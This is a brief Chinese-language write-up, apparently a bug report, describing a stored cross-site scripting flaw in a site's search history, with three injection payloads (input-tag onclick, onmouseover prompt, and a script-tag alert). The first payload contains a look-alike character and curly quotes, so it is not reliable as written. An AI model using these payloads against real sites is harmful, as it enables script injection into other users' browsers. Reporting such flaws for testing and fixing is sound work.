1.这里的XSS存在于历史记录中,首先在搜索框中输入xss语句:<input value="" οnclick=alert(‘xss’) type=“text”>,但是新打开链接后,页面载入出错
2.返回查看搜索记录,点击搜索记录的搜索框,即可弹窗
注:这里使用其他的语句也可弹窗:
<input name="name" value="" onmouseover=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>